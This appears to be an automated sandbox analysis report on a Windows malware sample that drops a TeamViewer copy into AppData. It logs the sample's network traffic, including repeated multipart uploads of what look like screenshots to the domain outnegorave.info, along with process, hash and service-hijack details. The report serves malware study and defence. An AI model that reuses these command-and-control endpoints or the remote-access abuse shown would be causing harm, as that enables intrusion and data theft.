Sep 15, 2021 14:08:01.287225962 CEST | 932 | OUT | GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master1.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:01.309426069 CEST | 933 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-length: 0
Sep 15, 2021 14:08:01.314114094 CEST | 933 | OUT | GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master1.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:01.335100889 CEST | 934 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-Type: application/octet-stream
  Content-length: 443
  Data Raw: 17 24 13 b6 01 98 20 27 a5 af 98 98 18 18 18 2f 96 af 99 2f af 99 9b 97 19 1a 99 17 19 19 99 17 18 98 1c 9d 1c 18 2f 99 99 9b 1c 1c af 98 af 96 98 af 98 17 18 17 18 17 18 2f af 98 9c 1a 97 18 9c 1c 17 19 99 17 18 98 af 98 9c 1a 97 18 9c 1c 17 19 99 17 18 af 98 2f 99 9c 98 98 1b 99 19 1b 1b af 98 af 98 2f 98 2f 98 2f 98 9c 9a 19 9b 9c 9b 9b 19 1a af af 99 9b 97 19 1a 99 17 19 19 99 17 18 98 1c 96 19 18 99 97 19 19 1b 97 18 9b 19 97 18 99 9b 16 18 9c 1c 17 18 9b 99 17 18 9c 99 17 18 98 18 96 18 9a 9c 97 18 99 19 17 18 9c 19 17 19 18 1b 16 18 9c 1c 17 18 9b 99 17 19 1a 1a 97 18 99 9a 96 19 18 99 97 19 19 1b 97 18 9c 1b 17 18 9a 98 16 18 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 9a 98 16 18 9c 1c 17 18 9b 99 17 19 1a 1b 17 18 9c 19 96 18 9a 9c 97 1c 17 19 19 1c 97 19 19 9a 16 18 9c 1c 17 1b 1a 97 1b 9b 17 18 99 9c 16 18 9a 9c 97 1c 17 1c 1c 17 18 99 9c 16 18 9c 1c 17 18 9b 99 17 19 19 99 97 18 9b 9a 96 18 9b 9c 17 19 1a 9a 97 18 9a 9a 97 18 9b 1a 16 19 9b 97 19 1a 99 17 19 1a 1b 17 18 98 19 16 19 18 9b 97 18 9a 1b 17 19 18 97 18 9a 18 16 1c 9a 17 18 9b 17 1b 17 18 9b 9a 96 18 9c 1c 17 18 9b 99 17 19 19 19 97 18 98 9b 96 19 18 99 97 19 19 1b 97 18 9c 1a 97 18 99 9c 96 19 18 9b 97 18 9a 1b 17 19 19 97 18 9a 9c 16 19 18 9b 97 18 9a 1b 17 18 99 97 18 99 99 af b2 b3 17 b1 31 98 33 9a a1 a4 b4 26 36 a8 18 21 a0 a0 a0 a0 af
  Data Ascii: $ '////////13&6!


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.6 | 49756 | 37.252.232.109 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.395808935 CEST | 934 | OUT | GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 37.252.232.109
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:01.435075998 CEST | 934 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-Type: application/octet-stream
  Content-length: 17
  Data Raw: 17 24 66 61 73 74 31 32 38 35 32 34 30 38
  Data Ascii: $fast12852408
Sep 15, 2021 14:08:01.808084965 CEST | 936 | OUT | POST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 37.252.232.109
  Content-Length: 500000
  Connection: Keep-Alive
  Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.6 | 49757 | 37.252.232.109 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.495162010 CEST | 935 | OUT | POST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 37.252.232.109
  Content-Length: 3
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:01.627052069 CEST | 936 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-length: 0
Sep 15, 2021 14:08:02.235275030 CEST | 937 | OUT | GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 37.252.232.109
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:02.278043985 CEST | 937 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-Type: application/octet-stream
  Content-length: 500000
  Data Raw: 17 24 11 04 00 94 03 ef 2e
  Data Ascii: $.


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49758 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 12:08:03 UTC | 0 | OUT | POST /B8C631A8/ HTTP/1.1
  Content-Length: 87812
  Content-Type: multipart/form-data; boundary=--------2771230636
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: outnegorave.info
  Connection: Close
  Cache-Control: no-cache
2021-09-15 12:08:03 UTC | 0 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 37 31 32 33 30 36 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
  Data Ascii: ----------2771230636Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
2021-09-15 12:08:03 UTC | 0 | OUT | Data Raw: b3 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 e6 af 4a 6b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 79 0b 3b 85 19 5a 1e 56 7d e2 9e 04 9a ec a4 7b 68 07 48 47 6c fb 65 62 4f f6 d5 8b 9a f7 cd c9 c4 1a a0 86 08 4a 0b d5 08 f4 be 62 08 d6 15 e7 ce 36 99 fc 4a d9 1a af a3 d2 9e 3b e2 b9 24 26 9c c4 65 1f a7 f4 c8 59 9d b6 d1 6d a8 b8 c6 f0 2d fc 05 23 22 ba b8
  Data Ascii: .(&<c&(yPNJk^y;ZV}{hHGlebOJb6J;$&eYm-#"
2021-09-15 12:08:03 UTC | 0 | OUT | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
  Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                      Data Ascii: i}(A|E}x?G8r;_D}(<?QG1"<cE9F+"(!1"iGyGC|R!1"uF)Q.QEH)j*)!-{ArQQGBZ**(MECE9h!5
                                                                                                                      2021-09-15 12:08:03 UTC85OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 37 31 32 33 30 36 33 36 2d 2d 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2771230636--
                                                                                                                       2021-09-15 12:08:04 UTC | 85 kB | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:08:04 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=ddccde455271131aa0b714df2720e21d55a3a6bfbd1d37b175bcd503cf90f9d2; expires=Thu, 15-Sep-2022 12:08:03 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Uk4xUJSb82XHn%2BPd%2F2ObLeDWOCSDzYadeWCDROZejiDEgioYH3EqGxaJu8nj7SulPtttBGoqnBjd3bO0OvJZ736Z1BhiKzS3hPTQfhQGOWcZpDpJwKD5KFx4J1VzEbygQta"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1bcfe6d7f4ec1-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                       2021-09-15 12:08:04 UTC | 86 kB | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56


                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                       1 | 192.168.2.6 | 49834 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                       Timestamp | kBytes transferred | Direction | Data
                                                                                                                       2021-09-15 12:09:06 UTC | 86 kB | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 90555
                                                                                                                      Content-Type: multipart/form-data; boundary=--------2341619378
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                       2021-09-15 12:09:06 UTC | 87 kB | OUT | ----------2341619378
                                                                                                                       Content-Disposition: form-data; name="k"
                                                                                                                       Content-Type: text/plain
                                                                                                                       Content-Transfer-Encoding: binary
                                                                                                                       2021-09-15 12:09:06 UTC | 175 kB | OUT | ----------2341619378--
                                                                                                                       2021-09-15 12:09:08 UTC | 175 kB | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:09:08 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=1ff005bf053274c8a139f292716a4c6a768fa2a22f3e2fadac5c81cd183e83b3; expires=Thu, 15-Sep-2022 12:09:06 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x887YJH4ElMCRx5jXS5zp7w2i9CCz2a7gNC3SmSP0jfXvX1CBsLZHCBBCZCuGLC7llR1s1BULe1hls%2BFVNabz8eMo77mRp3szhth%2BuRkzXPnYaiqdhll3KvKSXGGvgzu6mP6"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1be891a6a4e86-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                       2021-09-15 12:09:08 UTC | 176 kB | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56


                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                       2 | 192.168.2.6 | 49839 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                       Timestamp | kBytes transferred | Direction | Data
                                                                                                                       2021-09-15 12:10:08 UTC | 176 kB | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 86397
                                                                                                                      Content-Type: multipart/form-data; boundary=--------1750076427
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                       2021-09-15 12:10:08 UTC | 176 kB | OUT | ----------1750076427
                                                                                                                       Content-Disposition: form-data; name="k"
                                                                                                                       Content-Type: text/plain
                                                                                                                       Content-Transfer-Encoding: binary
                                                                                                                       2021-09-15 12:10:08 UTC | 261 kB | OUT | ----------1750076427--
                                                                                                                       2021-09-15 12:10:18 UTC | 261 kB | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:10:18 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=f4b2fe0e693337d31e5a414d614f56856b1c8f2532f060351f24f1a8e78bef0f; expires=Thu, 15-Sep-2022 12:10:08 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HEO3VrQh%2FvsTQW6Ij0CiQ7HlUyvWT4dITU60tYAYAZNimIVLNAITa%2F0OfXSbs2EwB%2FgZldrqHYIcjCi1UnLEk%2Ff8e75Y8OV5XkBDyWgkrRa1n%2FGmG9sOa5gg7ewy%2FQkW21zQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1c00cbaeed729-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                      2021-09-15 12:10:18 UTC262INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                      Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                      Code Manipulations

                                                                                                                      Statistics

                                                                                                                      Behavior

                                                                                                                      System Behavior

General

Start time: 14:07:31
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:07:32
Start date: 15/09/2021
Path: C:\Users\user\Desktop\77Etc0bR2v.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Imagebase: 0x400000
File size: 1828192 bytes
MD5 hash: E71E3B995477081569ED357E4D403666
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 14:07:35
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, Metadefender, Browse
• Detection: 0%, ReversingLabs
Reputation: low

General

Start time: 14:07:47
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 14:07:55
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:08:00
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Imagebase: 0x890000
File size: 44520 bytes
MD5 hash: FA6C268A5B5BDA067A901764D203D433
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:08:09
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:08:11
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 14:08:19
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 14:08:20
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:08:19
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:08:27
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:08:49
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                                                                                                      Disassembly

                                                                                                                      Code Analysis
